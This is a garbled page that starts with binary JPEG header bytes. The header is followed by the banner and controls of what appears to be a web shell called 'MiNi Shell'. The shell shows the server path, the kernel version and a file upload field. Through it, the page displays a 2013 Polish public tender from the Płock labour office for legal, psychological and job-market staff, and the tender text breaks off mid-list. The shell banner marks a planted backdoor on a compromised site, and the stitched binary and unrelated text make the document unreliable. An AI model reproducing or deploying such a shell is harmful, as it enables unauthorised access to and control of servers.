JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130221/74574-N-2013.html

<p class="kh_header"><b>Płock: Wyłonienie i zatrudnienie personelu  z ramienia Partnera (MUP w Płocku) w projekcie Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka nr POKL.07.02.01-14-028/11, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym</b><br>
<b>Numer ogłoszenia: 74574 - 2013; data zamieszczenia: 21.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Urząd Pracy , ul. 3 Maja 16, 09-400 Płock, woj. mazowieckie, tel. 0-24 367 18 30, faks 0-24 367 18 31.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyłonienie i zatrudnienie personelu  z ramienia Partnera (MUP w Płocku) w projekcie Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka nr POKL.07.02.01-14-028/11, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wyłonienie i zatrudnienie personelu z ramienia Partnera (MUP w Płocku) w projekcie Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka nr POKL. 07.02.01-14-028/11, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym - ilość części 6.
Część 1 - Prawnik w ramach zindywidualizowanego wsparcia prawnego.
Część 2 - Psycholog w ramach zindywidualizowanego wsparcia psychologicznego.
Część 3 - Doradca w ramach zindywidualizowanego wsparcia z zakresu rynku pracy.
Część 4 - Opiekun - nadzór nad grupami docelowymi.
Część 5 - Trener na warsztatach Rozwój usług społecznych.
Część 6 - Trener na warsztatach Wracam na rynek pracy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4, 85.31.23.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 - Prawnik w ramach zindywidualizowanego wsparcia prawnego.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, kierunek: prawo,
b)	doświadczenie w zakresie stosowania przepisów prawa karnego, rodzinnego oraz prawa pracy,
c)	co najmniej 3 letni staż pracy w Publicznych Służbach Zatrudnienia,
d)	znajomość problematyki lokalnego rynku pracy.
Część 2 - Psycholog w ramach zindywidualizowanego wsparcia psychologicznego.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, kierunek: psychologia,
b)	co najmniej 4 letnie doświadczenie zawodowe na stanowisku psychologa,
c)	doświadczenie zawodowe w prowadzeniu konsultacji i porad psychologicznych w zakresie rozwiązywania problemów społecznych (co najmniej 230 godzin),
d)	co najmniej 4 letni  staż pracy w Publicznych Służbach Zatrudnienia,
e)	doświadczenie w realizacji projektów współfinansowanych z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w zakresie udzielania porad dla osób bezrobotnych lub zagrożonych wykluczeniem społecznym.
Część 3 - Doradca w ramach zindywidualizowanego wsparcia z zakresu rynku pracy.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, kierunek: administracja,
b)	studia podyplomowe z zakresu doradztwa zawodowego,
c)	doświadczenie zawodowe w pracy z osobami bezrobotnymi,
d)	znajomość ustawy o promocji zatrudnienia i instytucjach rynku pracy oraz aktów normatywnych tej ustawy,
e)	co najmniej10 letni staż pracy w Publicznych Służbach Zatrudnienia,
f)	ukończenie szkolenia z zakresu zasady równości szans kobiet i mężczyzn w realizacji projektów współfinansowanych z Unii Europejskiej.
Część 4 - Opiekun - nadzór nad grupami docelowymi.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, kierunek pedagogika,
b)	studia podyplomowe z zakresu doradztwa zawodowego i zarządzania kompetencjami,
c)	co najmniej 2 letnie doświadczenie zawodowe w realizacji projektów współfinansowanych 
z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
d)	co najmniej 4 letni staż pracy w Publicznych Służbach Zatrudnienia,
e)	ukończenie szkolenia z zakresu zasady równości szans kobiet i mężczyzn w realizacji projektów współfinansowanych z Unii Europejskiej,
f)	co najmniej 4 letni staż pracy na stanowisku pedagoga wychowawcy.
Część 5 - Trener na warsztatach Rozwój usług społecznych.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe magisterskie, kierunek: ekonomia,
b)	studia podyplomowe  w zakresie Pedagogiki Kształcenia Zawodowego ,
c)	co najmniej roczne doświadczenie zawodowe w realizacji projektów współfinansowanych 
z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego na stanowisku Koordynator projektu, Kierownik projektu,
d)  ukończenie szkolenia z zakresu stosowania zasady równości szans kobiet i mężczyzn podczas realizacji projektów współfinansowanych z Unii Europejskiej.

Część 6 - Trener na warsztatach Wracam na rynek pracy.
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą łącznie:
a)	wykształcenie wyższe, kierunek: pedagogika,
b)	doświadczenie zawodowe w pracy z osobami bezrobotnymi ,
c)	 znajomość ustawy o promocji zatrudnienia i instytucjach rynku pracy oraz aktów normatywnych tej ustawy,
d)	co najmniej 4 letni staż pracy w Publicznych Służbach Zatrudnienia,
e)	znajomość problematyki lokalnego rynku pracy,
f)	ukończone szkolenie z zakresu coachingu w pracy doradcy zawodowego,
g)	ukończone szkolenie z zakresu poszukiwania pracy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty - Załącznik Nr 1 do SIWZ.
2. Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio  z załączonych dokumentów (należy jednak załączyć dokumenty, z których wynikać będzie ciągłość i prawidłowość udzielonych pełnomocnictw - odpisy z właściwego rejestru). Załączone do oferty pełnomocnictwo winno być w formie oryginału lub kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonywania w umowie następujących zmian w zakresie:
1)  wynagrodzenia w przypadku ustawowej zmiany podatku VAT,
2)  przypadków losowych, które będą miały wpływ na treść zawartej umowy i termin realizacji,
3) zmiany terminu realizacji projektu, w ramach którego umowa jest realizowana, co będzie miało wpływ na zmianę terminu obowiązywania niniejszej umowy,
4) zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, zmiany będące następstwem działania organów administracji.
2.Wszelkie zmiany i uzupełnienia umowy wymagają akceptacji obu stron i formy pisemnego aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mup.bip.ump.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Urząd Pracy w Płocku ul. 3 Maja 16, 09-400 Płock, pok. 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2013 godzina 10:00, miejsce: Miejski Urząd Pracy w Płocku ul. 3 Maja 16, 09-400 Płock, pok. 102 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka nr POKL. 07.02.01-14-028/11, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prawnik w ramach zindywidualizowanego wsparcia prawnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Prawnika w ramach zindywidualizowanego wsparcia prawnego:
- zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
- udzielanie porad prawnych z zakresu prawa rodzinnego, obejmujących m.in. kwestie związane z zawarciem małżeństwa, praw i obowiązków małżonków, separacji, pokrewieństwa, obowiązków alimentacyjnych oraz opieki nad małoletnimi,
- udzielanie porad w sprawach z zakresu prawa karnego, 
- udzielanie porad prawnych z zakresu prawa pracy, 
- pomoc w sporządzaniu pism, w tym z zakresu prawa pracy, rodzinnego i prawa karnego,
- współpraca z koordynatorem ds. realizacji wsparcia projektu pn.: Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka, innymi pracownikami zatrudnionymi w projekcie oraz Zespołem odpowiedzialnym za realizację ww. projektu,
- prowadzenie dokumentacji w zakresie ww. działań,
- prowadzenie spotkań na podstawie harmonogramu uzgodnionego z koordynatorem ds. realizacji wsparcia, - prowadzenie miesięcznych kart czasu pracy,
- przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Psycholog w ramach zindywidualizowanego wsparcia psychologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Psychologa w ramach zindywidualizowanego wsparcia psychologicznego:
- zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
- udzielanie specjalistycznego poradnictwa psychologicznego,
- udzielanie informacji, wskazówek i pomocy w zakresie rozwiązywania spraw życiowych osobom, które dzięki tej pomocy będą zdolne samodzielnie rozwiązywać problemy będące przyczyną trudnej sytuacji życiowej,
- wspieranie uczestników projektu w zakresie podnoszenia ich kompetencji życiowych 
i umiejętności społecznych,
- prowadzenie indywidualnych spotkań z uczestnikami projektu Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka mających na celu rozpoznanie potrzeb uczestnika,
- prowadzenie dokumentacji z udzielonych porad,
- współpraca z koordynatorem ds. realizacji wsparcia projektu pn.: Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka, innymi pracownikami zatrudnionymi w projekcie oraz Zespołem odpowiedzialnym za realizację ww. projektu,
- prowadzenie spotkań na podstawie harmonogramu uzgodnionego z koordynatorem ds. realizacji wsparcia,
- prowadzenie miesięcznych kart czasu pracy,
- przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Doradca w ramach zindywidualizowanego wsparcia z zakresu rynku pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Doradcy w ramach zindywidualizowanego wsparcia z zakresu rynku pracy:
- zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
- świadczenie pomocy uczestnikom projektu w wyborze odpowiedniego zawodu, informacji o zawodach, rynku pracy oraz uzyskaniu zatrudnienia,
- pozyskiwanie informacji na temat potencjału uczestników projektu, ich sytuacji społeczno - zawodowej, potrzeb, aspiracji, możliwości rozwojowych, a także ukierunkowanie ich do wyboru odpowiedniego kierunku szkolenia,
- pomoc uczestnikom projektu w powrocie na otwarty rynek pracy, 
- prowadzenie dokumentacji w zakresie ww. działań, 
- współpraca z koordynatorem ds. realizacji wsparcia projektu pn.: Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka, innymi pracownikami zatrudnionymi w projekcie oraz Zespołem odpowiedzialnym za realizację ww. projektu,
- prowadzenie spotkań na podstawie harmonogramu uzgodnionego z koordynatorem ds. realizacji wsparcia,
- prowadzenie miesięcznych kart czasu pracy,
- przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opiekun - nadzór nad grupami docelowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Opiekuna - nadzoru nad grupami docelowymi:
- zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
- opieka nad grupą 90 osób (udzielanie porad i wsparcia w sytuacjach trudnych lub kryzysowych mających miejsce podczas realizacji projektu, bezpośrednie przekazywanie informacji uczestnikom projektu związanych ze sprawami organizacyjnymi),
- udział przy rekrutacji uczestników projektu,
- nadzór nad sprawami organizacyjnymi związanymi z uczestnikami projektu, w tym czuwanie nad obecnością uczestników podczas szkoleń, warsztatów i innych spotkań przewidzianych w ramach projektu,
- niezwłoczne informowanie Koordynatora projektu o nieusprawiedliwionej nieobecności uczestników projektu podczas szkoleń i warsztatów,
- nadzorowanie statusów uczestników projektu w ewidencji osób bezrobotnych,
- współpraca z organizatorem szkoleń w zakresie kontrolowania uczestników projektu,
- współpraca z psychologiem, prawnikiem i doradcą zatrudnionymi w ramach ww. projektu,
- współpraca z koordynatorem ds. realizacji wsparcia  projektu pn.: Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka, innymi pracownikami zatrudnionymi w projekcie oraz Zespołem odpowiedzialnym za realizację ww. projektu,
- prowadzenie miesięcznych kart czasu pracy,
- przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Trener na warsztatach Rozwój usług społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Trenera na warsztatach Rozwój usług społecznych:
- zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
- udzielenie pomocy uczestnikom projektu w odbudowywaniu i podtrzymywaniu umiejętności uczestnictwa w życiu społeczności lokalnej, w powrocie do pełnienia ról społecznych,
- udzielenie pomocy w przełamywaniu obaw dotyczących relacji i postrzegania więźnia w środowisku rodziny, znajomych i współpracowników,
- podnoszenie wiedzy i umiejętności w zakresie radzenia sobie z codziennymi problemami,
- prowadzenie dokumentacji w zakresie ww. działań, 
- współpraca z koordynatorem ds. realizacji wsparcia projektu pn.: Nowy start z nowymi kwalifikacjami - program wsparcia osób zagrożonych wykluczeniem społecznym z obszaru m. Płocka, innymi pracownikami zatrudnionymi w projekcie oraz Zespołem odpowiedzialnym za realizację ww. projektu,
- prowadzenie spotkań na podstawie harmonogramu uzgodnionego z koordynatorem ds. realizacji wsparcia,
- prowadzenie miesięcznych kart czasu pracy,
- przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Trener na warsztatach Wracam na rynek pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Trenera na warsztatach Wracam na rynek pracy:
- zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.),
- pomoc w dokonaniu analizy posiadanych przez uczestników projektu umiejętności 
i predyspozycji do wykonywania określonej pracy,
- opracowanie z uczestnikami projektu strategii pokonywania barier w powrocie na rynek pracy i uzyskaniu zatrudnienia,
- diagnozowanie wewnętrznych i zewnętrznych barier oraz trudności w znalezieniu zatrudnienia przez uczestników projektu,
- pomoc w sporządzaniu dokumentów niezbędnych w poszukiwaniu pracy: życiorys i list motywacyjny,
